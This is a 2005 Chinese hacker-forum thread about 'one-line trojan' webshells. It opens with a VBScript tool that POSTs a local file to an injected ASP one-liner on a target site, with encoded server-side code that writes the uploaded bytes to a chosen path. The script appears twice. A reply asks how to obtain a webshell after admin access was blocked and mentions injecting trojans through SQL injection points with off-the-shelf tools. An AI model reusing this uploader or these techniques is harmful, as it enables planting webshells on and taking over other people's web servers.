[这个贴子最后由lopo1983在 2005/11/26 09:30pm 第 1 次编辑]
http://3800cc.com/donghua/e/10173.html
with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),"\","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")
url= "http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22"&ffn&"%22%2C2%0D%0Aend+with%0D%0AResponse.end"
fn=.arguments(0)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with
:em20:作者: 巧克力猪头 时间: 2005-11-27 09:40 标题: [讨论]一句话木马连接被阻~~~~~~~
很明显我看过这个动画~~~~~~~~~~~~~~~
但是~~~~~“系统提示我:系统禁止~~~~直接~~~~~转入后台管理页面”说明如果没限制的话,我就得到wedshell了~~~~~~~~~~怎么才能拿wedshell?
另外!~~~~用明小子工具直接从注入点向数据库里面写一句话木马的asp文件(或者是海洋2006的server.asp),还是连不上~~是怎么回事呢?
最后~~~关键之所在:我E文不太好+++++C没学好======“with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),"\","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")
url= "http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22"&ffn&"%22%2C2%0D%0Aend+with%0D%0AResponse.end"
fn=.arguments(0) end with with createobject("adodb.stream") .type=1:.open:.loadfromfile fn:s=.read:.close end with with createobject("microsoft.xmlhttp") .open "post",url,false:.send s wscript.echo .statustext end with”到底是什么意思?是不是用命令写入一个可写的*.asp文件呢?邪恶八进制我曾经找到这样的文章~~~~~但是~~~~没有记下来~~~~~~~~~~~~~~~~~菜到天崩地裂也不要笑我呀~~~~~~~~~~~~5555…………
